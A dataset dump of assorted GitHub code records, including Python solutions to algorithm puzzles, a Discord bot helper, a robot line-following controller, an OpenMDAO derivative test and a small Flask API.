pyqrcode.create(s).png(name,scale = 10)\n print(name)\n\n# contoh file qrData\n# 883427597189\n# 883427597189\n# 883427597189\n","repo_name":"OmahTI-UGM/HacktoberFest2020","sub_path":"Python/qrPokemon.py","file_name":"qrPokemon.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20190345039","text":"from C4Env import C4Env\nimport time\n\nenv = C4Env()\nfor i_episode in range(2):\n observation = env.reset()\n done = False\n while not done:\n action = env.random_move()\n env.render()\n observation, reward, done, info = env.step(action)\n","repo_name":"Louis-Bagot/AtariRL","sub_path":"c4/env_tester.py","file_name":"env_tester.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35447982104","text":"# -*- coding: utf-8 -*-\n\"\"\"\n剑指 Offer 37. 
序列化二叉树\n请实现两个函数,分别用来序列化和反序列化二叉树。\n\n示例: \n\n你可以将以下二叉树:\n\n 1\n / \\\n 2 3\n / \\\n 4 5\n\n序列化为 \"[1,2,3,null,null,4,5]\"\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string.\n 时间复杂度 O(N) : N 为二叉树的节点数,层序遍历需要访问所有节点,\n 最差情况下需要访问 N + 1 个 null ,总体复杂度为 O(2N + 1) = O(N)。\n 空间复杂度 O(N) : 最差情况下,队列 queue 同时存储 (N+1) / 2 个节点(或 N+1 个 null ),使用 O(N) ;\n 列表 res 使用 O(N) 。\n :type root: TreeNode\n :rtype: str\n \"\"\"\n if not root:\n return \"[]\"\n queue = list()\n queue.append(root)\n res = []\n while queue:\n node = queue.pop(0)\n if node:\n res.append(str(node.val))\n queue.append(node.left)\n queue.append(node.right)\n else:\n res.append(\"null\")\n while res[-1] == \"null\":\n res.pop()\n res = \"[\" + \",\".join(res) + \"]\"\n return res\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n 时间复杂度 O(N) : N 为二叉树的节点数,按层构建二叉树需要遍历整个 vals ,其长度最大为 2N+1 。\n 空间复杂度 O(N) : 最差情况下,队列 queue 同时存储 (N+1) / 2 个节点,因此使用 O(N) 额外空间。\n :type data: str\n :rtype: TreeNode\n \"\"\"\n if data == \"[]\": return\n vals, i = data[1:-1].split(','), 1\n root = TreeNode(int(vals[0]))\n queue = list()\n queue.append(root)\n while queue:\n node = queue.pop(0)\n try:\n if vals[i] != \"null\":\n node.left = TreeNode(int(vals[i]))\n queue.append(node.left)\n except IndexError:\n pass\n i += 1\n try:\n if vals[i] != \"null\":\n node.right = TreeNode(int(vals[i]))\n queue.append(node.right)\n except IndexError:\n pass\n i += 1\n return root\n\n\n# Your Codec object will be instantiated and called as such:\n# codec = Codec()\n# codec.deserialize(codec.serialize(root))\n\nif __name__ == '__main__':\n nodes = \"[1,2,3,null,null,4,5]\"\n\n codec = Codec()\n root = codec.deserialize(nodes)\n print(codec.serialize(root))\n","repo_name":"MaoningGuan/LeetCode","sub_path":"剑指 Offer(第 2 版)/serialize_deserialize.py","file_name":"serialize_deserialize.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"15115837581","text":"from datetime import datetime\nfrom discord.ext import commands\nfrom helper import RankingDb\nimport json\nclass FilterError(commands.CommandError):\n pass\nclass ParamParseError(FilterError):\n pass\n\ndef time_format(seconds):\n seconds = int(seconds)\n days, seconds = divmod(seconds, 86400)\n hours, seconds = divmod(seconds, 3600)\n minutes, seconds = divmod(seconds, 60)\n return days, hours, minutes, seconds\n\n\ndef pretty_time_format(seconds):\n days, hours, minutes, seconds = time_format(seconds)\n timespec = [\n (days, 'day', 'days'),\n (hours, 'hour', 'hours'),\n (minutes, 'minute', 'minutes'),\n (seconds, 'second', 'seconds')\n ]\n timeprint = [(cnt, singular, plural) for cnt, singular, plural in timespec if cnt]\n\n def format_(triple):\n cnt, singular, plural = triple\n return f'{cnt} {singular if cnt == 1 else plural}'\n\n return ' '.join(map(format_, timeprint))\n\ndef parse_date(arg):\n try:\n if len(arg) == 8:\n fmt = '%d%m%Y'\n elif len(arg) == 6:\n fmt = '%m%Y'\n elif len(arg) == 4:\n fmt = '%Y'\n else:\n raise ValueError\n return datetime.strptime(arg, fmt)\n except ValueError:\n raise ParamParseError(f'{arg} is an invalid date argument')\n\nclass DayFilter():\n def __init__(self):\n self.low = datetime.strptime(\"2000\", \"%Y\")\n self.hi = datetime.strptime(\"3000\", \"%Y\")\n def filter(self, 
date):\n return self.low <= date and date < self.hi\n \n def parse(self, args):\n args = list(set(args))\n handle = None\n for arg in args:\n if arg[0:2] == 'd<':\n self.hi = min(self.hi, parse_date(arg[2:]))\n elif arg[0:3] == 'd>=':\n self.low = max(self.low, parse_date(arg[3:]))\n else:\n handle = arg\n return handle\n\nasync def get_handle(ctx, handle):\n if handle is None:\n handle = RankingDb.RankingDb.get_handle(ctx.author.id)\n if handle is None:\n await ctx.send(f'Không tìm thấy nick của {ctx.author.mention} trong dữ liệu. Xin hãy dùng command ;voj identify nick_cf')\n return None\n return handle\n else:\n handle = handle.replace('!', '')\n if handle[0] == '<' and handle[-1] == '>':\n if len(handle) <= 3 or not handle[2:-1].isdigit():\n await ctx.send(f'Handle {handle} is invalid.')\n return None\n discord_id = handle[2:-1]\n handle = RankingDb.RankingDb.get_handle(discord_id)\n if handle is None:\n await ctx.send(f'Không tìm thấy nick của <@{discord_id}> trong dữ liệu.')\n return None\n return handle\nSPOJ_CNT_AC = json.load(open('database/spoj_cnt_ac.json'))\nproblem_points = None\ndef get_problem_points(force=False):\n global problem_points\n if problem_points != None and not force:\n return problem_points\n problem_info = RankingDb.RankingDb.get_table(RankingDb.PROBLEM_TABLE)\n problem_info = list(map(lambda x: (x['name'], str(x['contestId']) + '/' + x['index'], x['cntAC']), problem_info))\n problem_points = {}\n for problem_name, links, cnt_AC in problem_info:\n name = problem_name[:problem_name.find('-')].strip()\n spoj_cnt = 0\n if name in SPOJ_CNT_AC:\n spoj_cnt = SPOJ_CNT_AC[name]\n point = 200 / (100 + int(cnt_AC) + spoj_cnt)\n problem_points[problem_name] = point\n return problem_points","repo_name":"leduythuccs/VOJ-ranking-bot","sub_path":"helper/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27185318860","text":"S = input()\nl = len(S)\nans = 100000000\ncount = 1\nfor i in range(l-1):\n\tif S[i+1] != S[i]:\n\t\ttmp = max([i+1,l-i-1])\n\t\tans = min([ans,tmp])\n\nif ans == 100000000:\n\tans = l\nprint(ans)\n\n","repo_name":"banboooo044/AtCoder","sub_path":"ABC083/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22981198565","text":"from collections import namedtuple\nfrom typing import Callable, Tuple\n\nimport numpy as np\nfrom scipy import linalg\nfrom .quadpotential import QuadPotential\n\n\nState = namedtuple(\"State\", \"q, p, v, q_grad, energy, model_logp\")\n\n\nclass IntegrationError(RuntimeError):\n \"\"\"Numerical errors during leapfrog integration.\"\"\"\n\n pass\n\n\nclass CpuLeapfrogIntegrator(object):\n \"\"\"Leapfrog integrator using the CPU.\"\"\"\n\n def __init__(\n self,\n potential: QuadPotential,\n logp_dlogp_func: Callable[[np.ndarray], Tuple[np.ndarray, np.ndarray]],\n ) -> None:\n \"\"\"Instantiate a CPU leapfrog integrator.\n\n Parameters\n ----------\n potential\n logp_dlogp_func\n \"\"\"\n self._potential = potential\n self._logp_dlogp_func = logp_dlogp_func\n\n def compute_state(self, q: np.ndarray, p: np.ndarray) -> State:\n \"\"\"Compute Hamiltonian functions using a position and momentum.\n\n Parameters\n ----------\n q\n Position.\n p\n Momentum\n \"\"\"\n logp, dlogp = self._logp_dlogp_func(q)\n v = self._potential.velocity(p)\n kinetic = self._potential.energy(p, 
velocity=v)\n energy = kinetic - logp\n return State(q, p, v, dlogp, energy, logp)\n\n def step(self, epsilon, state: State, out=None):\n \"\"\"Leapfrog integrator step.\n\n Half a momentum update, full position update, half momentum update.\n\n Parameters\n ----------\n epsilon: float, > 0\n step scale\n state: State namedtuple,\n current position data\n out: (optional) State namedtuple,\n preallocated arrays to write to in place\n\n Returns\n -------\n None if `out` is provided, else a State namedtuple\n \"\"\"\n try:\n return self._step(epsilon, state)\n except linalg.LinAlgError as err:\n msg = \"LinAlgError during leapfrog step.\"\n raise IntegrationError(msg)\n except ValueError as err:\n # Raised by many scipy.linalg functions\n scipy_msg = \"array must not contain infs or nans\"\n if len(err.args) > 0 and scipy_msg in err.args[0].lower():\n msg = \"Infs or nans in scipy.linalg during leapfrog step.\"\n raise IntegrationError(msg)\n else:\n raise\n\n def _step(self, epsilon, state: State) -> State:\n \"\"\"Perform one leapfrog step.\"\"\"\n pot = self._potential\n q, p, v, q_grad, energy, logp = state\n\n dt = 0.5 * epsilon\n\n # Half momentum step\n p_new = p + dt * q_grad\n\n # Whole position step\n v_new = pot.velocity(p_new)\n q_new = (q + epsilon * v_new).astype(q.dtype)\n\n # Half momentum step\n logp, q_new_grad = self._logp_dlogp_func(q_new)\n p_new = p_new + dt * q_new_grad\n\n kinetic = pot.velocity_energy(p_new, v_new)\n energy = kinetic - logp\n\n return State(q_new, p_new, v_new, q_new_grad, energy, logp)\n","repo_name":"eigenfoo/littlemcmc","sub_path":"littlemcmc/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"53"} +{"seq_id":"28894569137","text":"#!/bin/python3\nimport os, glob\nfrom latex import build_pdf, LatexBuildError\nfrom .watcher import Watcher\n\n\ndef compile_tex(tex_filename, printLog=True):\n base_filename = tex_filename.split('.tex')[0]\n pdf_filename = '{}{}'.format(base_filename, '.pdf')\n\n current_dir = os.path.abspath(os.path.dirname(__file__))\n\n with open(tex_filename) as tex_file:\n try:\n pdf = build_pdf(tex_file, texinputs=[current_dir, ''])\n pdf.save_to(pdf_filename)\n if printLog:\n print('compiling {} to {}'.format(tex_filename, pdf_filename))\n\n except LatexBuildError as e:\n for err in e.get_errors():\n print(u'Error in {0[filename]}, line {0[line]}: {0[error]}'.format(err))\n # also print one line of context\n print(u' {}\\n'.format(err['context'][1]))\n\n\ndef compile_tex_watcher_callback(event_type, file_path):\n if '.tex' in file_path:\n compile_tex(file_path)\n\n\ndef main():\n print('Watching for changes to any .tex file the local directory')\n Watcher(compile_tex_watcher_callback).run()\n","repo_name":"JoshuaNeely/python-latex","sub_path":"python_latex/compile_tex.py","file_name":"compile_tex.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36520503936","text":"# very good for creating lists easily\n# and also help in reading, modifying lists, generators etc.\n\nnums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\nmy_list = [n for n in nums]\nprint(my_list)\n\n# let's complicate\n\nsq_list = [n**2 for n in nums]\nprint(sq_list)\n\n# or you can use map with lambda in the following way, but more complicated.\nsq_list_map = map(lambda n: n**2, nums)\nprint(list(sq_list_map))\n\n# even more 
complication?\nif_even = [n for n in nums if n%2 == 0]\nprint(if_even)\n\n# can also use filter/map and lambda for this as well.\nif_even_map = filter(lambda n: n%2 == 0, nums)\nprint(list(if_even_map))\n\n\n# More complications? Make a letter number pair, for each letter in ABCD paired to each number.\nalphas = 'ABCD'\npairing = [(letter, num) for letter in alphas for num in nums]\nprint(pairing)\n\n# EvEN MORE? How about some superhero stuff zipping through the city? IN A DICTIONARY??\n\nnames = ['Bruce', 'Clark', 'Peter', 'Thor', 'Logan', 'Wade']\nheroes = ['Batman', 'Superman', 'Spiderman', 'Odinson', 'Wolverine', 'Deadpool']\n\nsuper_power = {name:hero for name, hero in zip(names, heroes) if name != 'Peter'}\nprint(super_power)\n\n\n# HOW ABOUT SET COMPREHENSIONS? You don't even know what SET is!!\n# SET --> A set is like a list but it has all unique values.\n\nnumss = [1, 1, 2, 3, 3, 4, 4, 5, 6, 6, 7, 7, 8, 8, 8, 9, 10]\n\n# Normal way of doing things.\n\n# my_set = set()\n# for n in numss:\n# my_set.add(n)\n# print(my_set)\n\n# Comprehension way is much much simpler!!\n\nmy_set = {n for n in numss}\nprint(m_set)\n\n","repo_name":"ameerhkhan/Python-Practice-Exercises","sub_path":"comprehensions/list_comprehensions.py","file_name":"list_comprehensions.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70847011688","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2020-08-01 11:28:48\n# @Author : Your Name (you@example.org)\n# @Link : http://example.org\n# @Version : $Id$\n\nimport os,sys\nimport touchSocket\nimport time\n\ndef test1():\n # x = '06ff'\n # x = x[::-1]\n # print(x)\n a = 1000\n b= str(hex(a))\n print(b)\n\ndef test():\n # a= {'a':1,'b':2}\n # print(a.a)\n client = touchSocket.ClientSocket('192.168.0.193')\n time.sleep(1)\n client.send('!')\n x = '[06ff]'\n print(x)\n client.send(x)\n client.send('1')\n while True:\n client.send('1')\n time.sleep(10)\n\nimport tkinter as tk\nfrom PIL import Image, ImageTk\n\nclass App(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master, width=400, height=300)\n self.pack()\n self.pilImage = Image.open(\"images/IMG_1614.jpg\")\n w,h = self.pilImage.size\n w = int(w*0.3)\n h = int(h*0.3)\n self.pilImage = self.pilImage.resize((w,h),Image.ANTIALIAS)\n self.tkImage = ImageTk.PhotoImage(image=self.pilImage)\n self.label = tk.Label(self, image=self.tkImage)\n self.label.pack()\n self.imageIndex = 0\n\n def resizeImg(self,pilimg):\n w,h = pilimg.size\n w = int(w*0.3)\n h = int(h*0.3)\n rimg = pilimg.resize((w,h),Image.ANTIALIAS)\n return rimg\n\n def processEvent(self):\n tmpimgpth = ''\n self.imageIndex += 1\n if self.imageIndex == 0:\n tmpimgpth = 'images/IMG_1614.jpg'\n elif self.imageIndex == 1:\n tmpimgpth = 'images/IMG_1615.jpg'\n else:\n tmpimgpth = 'images/IMG_1616.jpg'\n self.imageIndex = -1\n self.pilImage = Image.open(tmpimgpth)\n self.pilImage = self.resizeImg(self.pilImage)\n self.tkImage = ImageTk.PhotoImage(image=self.pilImage)\n self.label.configure(image=self.tkImage)\n self.label.image = self.tkImage\n self.label.update()\n print('xxx')\n def onFrame(self):\n self.processEvent()\n self.after(1000,self.onFrame)\n \ndef test2():\n #encoding=utf-8\n root = tk.Tk()\n app = App(root)\n root.geometry(\"+600+0\")\n app.after(1000,app.onFrame)\n\n root.mainloop()\ndef test3():\n a= 'a/b/c.png'\n x = os.path.splitext(a)\n print(x)\n#测试\nif __name__ == '__main__':\n test3()\n # 
test1()","repo_name":"fengmm521/yolov3_showDemo","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"984788865","text":"import RPi.GPIO as GPIO\nfrom Hardware_Controllers.Motor import PWM\nfrom Control_Programs.line_tracker import LineTracker\nfrom Hardware_Controllers.servo import Servo\n\n# For command-line arguments\nimport sys\n# For debugging, to print the entire exception when errors occur, but also handle it gracefully\nfrom traceback import print_exc\n\nfrom Misc_Code.commons import clamp, NodeType, Timer, Tracking, DriveInstructions, speed_state_dict, acc_state_dict\nfrom Hardware_Controllers.parse_UART import UARTCommunication\n\n\nclass ActiveConnectivityAccelerationLineDriver:\n def __init__(self, inverse_IR: bool, node_type: NodeType):\n self.inverse_IR = inverse_IR\n self.tracker = LineTracker(inverse_IR)\n\n self.node_type = node_type\n port_name = \"/dev/ttyACM0\"\n self.launchpad_comm = UARTCommunication(port_name)\n if self.node_type == NodeType.Coordinator:\n self.launchpad_comm.set_coordinator()\n\n def ac_line_driving_2(self):\n \"\"\"\n This implementation of Active Connectivity modifies\n the acceleration of the robots depending on the connection strength.\n \"\"\"\n current_acc = 0\n acc_update_period = 0.5\n acc_timer = Timer(acc_update_period)\n min_speed = speed_state_dict[DriveInstructions.SLOWER]\n max_speed = speed_state_dict[DriveInstructions.FASTER]\n current_speed = 0\n\n # ------ communication ------\n read_period = 4 # A message is sent every 5 seconds. We see if there's a new one every 9 seconds.\n read_timer = Timer(read_period)\n # Wait until a DriveInstruction is received,\n # which indicates that a connection between node and coordinator has been formed\n self.launchpad_comm.start_async()\n instruction = DriveInstructions.NONE # DriveInstructions.NONE\n while instruction == DriveInstructions.NONE:\n if read_timer.check():\n print(\"checking latest message\")\n instruction = self.launchpad_comm.recent_instruction\n if instruction != DriveInstructions.NONE:\n current_acc = acc_state_dict[instruction]\n\n current_speed = speed_state_dict[DriveInstructions.BASE]\n debug_i = 0\n while True:\n debug_i += 1\n\n # ------ communication ------\n if self.node_type == NodeType.Child:\n if read_timer.check():\n instruction = self.launchpad_comm.recent_instruction\n if instruction != DriveInstructions.NONE:\n current_acc = acc_state_dict[instruction]\n\n # ------ alignment ------\n alignment = self.tracker.get_alignment()\n\n # ------ fundamental driving ------\n if acc_timer.check(): # If we should update the speed by acceleration amount.\n current_speed += current_acc\n # Clamp it, so that we don't start to reverse, or go too fast for the line tracking to work.\n current_speed = clamp(current_speed, min_speed, max_speed)\n\n if alignment == Tracking.FORWARD.value:\n # If we are driving forwards, we can use the current speed.\n motor_values = [current_speed] * 4\n else:\n # Else, if we should turn to stay on the line.\n motor_values = alignment\n PWM.set_motor_model_by_iterable(motor_values)\n\n # ------ debugging ------\n if debug_i % 100 == 0:\n print(\"----\")\n print(\"current speed:{}\".format(current_speed))\n print(\"current acceleration:{}\".format(current_acc))\n print(\"fwd_motor_values:{}\".format(*motor_values))\n\n\nif __name__ == '__main__':\n print('Program is starting ... 
')\n\n try:\n sysargs = [arg.strip().lower() for arg in sys.argv]\n if \"child\" in sysargs:\n arg_nodetype = NodeType.Child\n else:\n arg_nodetype = NodeType.Coordinator\n if \"inverse\" in sysargs:\n arg_inverse = True\n else:\n arg_inverse = False\n\n print((\".\" * 10 + \"\\nStarting driver. IR inverse: {}\\n{}\\n\" + \".\" * 10).\n format(arg_inverse, arg_nodetype))\n driver = ActiveConnectivityAccelerationLineDriver(arg_inverse, arg_nodetype)\n driver.ac_line_driving_2()\n except KeyboardInterrupt: # Exception as e: # When 'Ctrl+C' is pressed, the child program will be executed.\n print(\"program was terminated.\")\n finally:\n print_exc()\n PWM.set_motor_model(0, 0, 0, 0)\n Servo().setServoPwm('0', 90)\n Servo().setServoPwm('1', 90)\n driver.launchpad_comm.finish_async()\n driver.launchpad_comm.reboot_launchpad()\n","repo_name":"Project-Repositories/BSC_Proj_IoRT","sub_path":"Robot Controller code/Demos/demo_4_acceleration.py","file_name":"demo_4_acceleration.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71523385448","text":"from app.database.connection import get_db\nfrom flask import jsonify, abort\n\n\ndef index():\n cur = get_db().cursor()\n cur.execute(\"SELECT * FROM types\")\n types = cur.fetchall()\n cur.close()\n\n return jsonify(types)\n\n\ndef create(data):\n type_name = data['name']\n\n cur = get_db().cursor()\n try:\n cur.execute(f\"INSERT INTO types(name) VALUES('{type_name}')\")\n get_db().commit()\n cur.close()\n except:\n cur.close()\n abort(400)\n\n return jsonify({'result': True}), 201\n\n\ndef delete(type_id):\n cur = get_db().cursor()\n\n cur.execute(f\"SELECT * FROM types WHERE id={type_id}\")\n type_obj = cur.fetchone()\n if type_obj is None:\n abort(400)\n\n cur.execute(f\"DELETE FROM types WHERE id={type_id}\")\n get_db().commit()\n cur.close()\n\n return jsonify({'result': True})\n\n\ndef list_photo():\n cur = get_db().cursor()\n cur.execute(\"SELECT * FROM types\")\n types = cur.fetchall()\n\n data = []\n for identifier in types:\n ty = identifier['id']\n cur.execute(f\"SELECT photo FROM photo_info pi NATURAL JOIN photo_most pm WHERE type={ty}\")\n identifier['photo'] = cur.fetchone()['photo']\n data.append(identifier)\n\n cur.close()\n\n return jsonify(data)\n","repo_name":"ARJOM/Awards","sub_path":"backend/app/controllers/types_controllers.py","file_name":"types_controllers.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6203778914","text":"#!./usr/bin/env.python\n# .-*- coding: utf-8 -*-\n# ._author_.=.\"Max丶\"\n# ._Email:_.=.\"max@chamd5.org\"\nimport time\nfrom prettytable import PrettyTable\nimport tabulate\nfrom borax.calendars.lunardate import LunarDate\nfrom QuXiang.QuXiang import *\n\n\n\ndef ShiChen():\n print(time.strftime(\"现在阳历时间为:%Y-%m-%d %H:%M\\n\", time.localtime()))\n Year = int(time.strftime(\"%Y\", time.localtime()))\n Month = int(time.strftime(\"%m\", time.localtime()))\n Day = int(time.strftime(\"%d\", time.localtime()))\n # 转换 农历年月日\n lunar_date = LunarDate.from_solar_date(Year, Month, Day)\n month = lunar_date.month\n day = lunar_date.day\n print(lunar_date.strftime('%G'))\n print('农历时间:', month, '月',day,'日','\\n')\n print('以下是时辰对应的数字:')\n print('子时 23:00-01:00:1 ')\n print('丑时 01:00-03:00:2 ')\n print('寅时 03:00-05:00:3 ')\n print('卯时 05:00-07:00:4 ')\n print('辰时 07:00-09:00:5 ')\n print('巳时 09:00-11:00:6 ')\n 
print('午时 11:00-13:00:7 ')\n print('未时 13:00-15:00:8 ')\n print('申时 15:00-17:00:9 ')\n print('酉时 17:00-19:00:10')\n print('戌时 19:00-21:00:11')\n print('亥时 21:00-23:00:12','\\n')\n\ndef YunSuan():\n #六神定义\n dict_list = ['大安☯(木)','留连☯(土)','速喜☯(火)','赤口☯(金)','小吉☯(水)','空亡☯(土)']\n dict_key = ['大安','留连','速喜','赤口','小吉','空亡']\n dict ={\"大安\":Daan,'留连':LiuLian,'速喜':SuXi,'赤口':ChiKou,'小吉':XiaoJi,'空亡':KongWang}\n s_month = int(input(\"请输入月/随机数:\"))\n s_day = int(input(\"请输入日/随机数:\"))\n s_hour = int(input(\"请输入时辰:\"))\n # s_month = 5\n # s_day = 4\n # s_hour = 8\n dict_shichen = ['子时(水)','丑时(土)','寅时(木)','卯时(木)','辰时(土)','巳时(火)','午时(火)','未时(土)','申时(金)','酉时(金)','戌时(土)','亥时(水)']\n\n # 运算 推算日月时辰对应的数字\n sum = s_month + s_day - 1\n today_i = int((sum - 1) % 6)\n month_i = int((s_month - 1) % 6)\n hour = s_month + s_day + s_hour\n hour_i =int((hour - 3) % 6)\n hour_s = hour_i - 1\n\n #运算 年月时辰对应的 六神三宫\n today_f = dict_list[today_i]\n month_f = dict_list[month_i]\n hour_f = dict_list[hour_i]\n shichen_f = dict_shichen[hour_s]\n table = PrettyTable(['☯天 时☯','☯地 利☯','☯人 和☯','☯用 神☯'])\n table.title = '☯三宫☯☯所属☯'\n table.add_row(['☯'+month_f+'☯','☯'+today_f+'☯','☯'+hour_f+'☯','☯'+shichen_f+'☯'])\n table.add_row(['☯起 因☯','☯经 过☯','☯现 在☯','☯未 来☯'])\n print(table)\n today_o = dict[dict_key[today_i]]()\n month_o = dict[dict_key[month_i]]()\n hour_o = dict[dict_key[hour_i]]()\n print('\\n\\n'+month_o+'\\n\\n',today_o+'\\n\\n',hour_o+'\\n\\n')\n print(HeGong()+'\\n\\n')\n print(table)\n\n\n\n\n\nif __name__ == '__main__':\n while True: #死循环 每一天运行一次配置\n ShiChen()\n YunSuan()\n time.sleep(86400)\n\n\n\n","repo_name":"MaxSecurity/Xiao6Ren","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"39233449527","text":"\nfrom math import log10\nfrom time import time\n\n\ndef main():\n Ln, n, a, b = 1000, 3, 2, 0\n for i in range(2, Ln+1):\n n, a = n + 2*a, n + a\n if int(log10(n)) > int(log10(a)): b += 1\n return b\n\n\nif __name__ == \"__main__\":\n start = time()\n print(\"Answer:{}\".format(main()))\n print(\"Time Taken : {}\".format(time() - start))\n \n","repo_name":"fermihacker/ProjectEuler100","sub_path":"Problem057.py","file_name":"Problem057.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9342148010","text":"import unittest\n\nimport numpy as np\nimport openmdao.api as om\nfrom openmdao.utils.assert_utils import assert_near_equal, assert_check_totals\n\nstep = 1e-6\nsize = 3\n\nclass Mult(om.ExplicitComponent):\n\n def setup(self):\n\n self.add_input('x', np.ones(size))\n self.add_input('y', np.ones(size))\n\n self.add_output('z', np.ones(size))\n\n self.declare_partials(of='*', wrt='*')\n\n def compute(self, inputs, outputs):\n\n outputs['z'] = inputs['x'] * inputs['y']\n\n def compute_partials(self, inputs, partials):\n\n partials['z', 'x'] = inputs['y']\n partials['z', 'y'] = inputs['x']\n\n\nclass GeometryAndAero(om.Group):\n\n def setup(self):\n\n self.add_subsystem(\"comp1\", Mult(), promotes_inputs=['y'])\n self.add_subsystem(\"comp2\", Mult(), promotes_inputs=['y'])\n self.add_subsystem(\"comp3\", Mult(), promotes_inputs=['y'])\n\n # self.connect('comp1.z', 'comp2.x')\n self.connect('comp2.z', 'comp3.x')\n\n if self.method == 'fd':\n self.approx_totals(step=step, step_calc=\"abs\", method=self.method, form=\"forward\")\n else:\n 
self.approx_totals(method=self.method)\n\n\nclass TestSemiTotals(unittest.TestCase):\n\n def test_semi_totals_fd(self):\n prob = om.Problem()\n\n sub = prob.model.add_subsystem('sub', GeometryAndAero(), promotes=['*'])\n sub.method = 'fd'\n\n prob.model.add_design_var(\"y\")\n prob.model.add_objective(\"comp3.z\", index=0)\n\n prob.setup(force_alloc_complex=True, check=False)\n prob.set_val(\"y\", 5.0 * np.ones(size))\n\n prob.run_model()\n\n # Deriv should be 75. Analytic was wrong before the fix.\n data = prob.check_totals(method=\"fd\", form=\"forward\", step=step, step_calc=\"abs\", out_stream=None)\n assert_check_totals(data, atol=1e-5, rtol=1e-6)\n\n def test_semi_totals_cs(self):\n prob = om.Problem()\n\n sub = prob.model.add_subsystem('sub', GeometryAndAero(), promotes=['*'])\n sub.method = 'cs'\n\n prob.model.add_design_var(\"y\")\n prob.model.add_objective(\"comp3.z\", index=0)\n\n prob.setup(force_alloc_complex=True, check=False)\n prob.set_val(\"y\", 5.0 * np.ones(size))\n\n prob.run_model()\n\n # Deriv should be 75. Analytic was wrong before the fix.\n data = prob.check_totals(method=\"cs\", out_stream=None)\n\n assert_check_totals(data, atol=1e-6, rtol=1e-6)\n\n def test_semi_totals_cs_indirect(self):\n prob = om.Problem()\n\n prob.model.add_subsystem('indeps', om.IndepVarComp('yy', np.ones(size)))\n prob.model.add_subsystem('comp', om.ExecComp('z=2*y', z=np.ones(size), y=np.ones(size)))\n sub = prob.model.add_subsystem('sub', GeometryAndAero(), promotes=['*'])\n sub.method = 'cs'\n\n prob.model.connect('indeps.yy', 'comp.y')\n prob.model.connect('comp.z', 'y')\n prob.model.add_design_var(\"indeps.yy\")\n prob.model.add_objective(\"comp3.z\", index=0)\n\n prob.setup(force_alloc_complex=True, check=False)\n prob.set_val(\"y\", 5.0 * np.ones(size))\n\n prob.run_model()\n\n # Deriv should be 75. 
Analytic was wrong before the fix.\n data = prob.check_totals(method=\"cs\", out_stream=None)\n\n assert_check_totals(data, atol=1e-6, rtol=1e-6)\n\n def test_multi_conn_inputs_manual_connect(self):\n\n prob = om.Problem()\n prob.model.add_subsystem('px1', om.IndepVarComp('x', 1.0))\n sub1 = prob.model.add_subsystem('sub1', om.Group())\n sub2 = prob.model.add_subsystem('sub2', om.Group())\n\n sub1.add_subsystem('src', om.ExecComp('y=x'))\n sub2.add_subsystem('comp1', om.ExecComp('z=x+y'))\n sub2.add_subsystem('comp2', om.ExecComp('z=x+y'))\n sub2.add_subsystem('comp3', om.ExecComp('z=x+y'))\n\n prob.model.connect('px1.x', 'sub1.src.x')\n prob.model.connect('sub1.src.y', 'sub2.comp1.y')\n prob.model.connect('sub1.src.y', 'sub2.comp2.y')\n prob.model.connect('sub1.src.y', 'sub2.comp3.y')\n\n sub2.approx_totals(method='cs')\n\n wrt = ['px1.x']\n of = ['sub2.comp1.z', 'sub2.comp2.z', 'sub2.comp3.z']\n\n prob.setup(mode='fwd')\n prob.run_model()\n\n assert_near_equal(prob['sub1.src.y'], 1.0, 1e-6)\n assert_near_equal(prob['sub2.comp1.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp2.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp3.z'], 2.0, 1e-6)\n\n data = prob.check_totals(of=of, wrt=wrt, method=\"fd\", out_stream=None)\n assert_check_totals(data, atol=1e-6, rtol=1e-6)\n\n # Check the total derivatives in reverse mode\n prob.setup(mode='rev')\n prob.run_model()\n\n assert_near_equal(prob['sub1.src.y'], 1.0, 1e-6)\n assert_near_equal(prob['sub2.comp1.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp2.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp3.z'], 2.0, 1e-6)\n\n data = prob.check_totals(of=of, wrt=wrt, 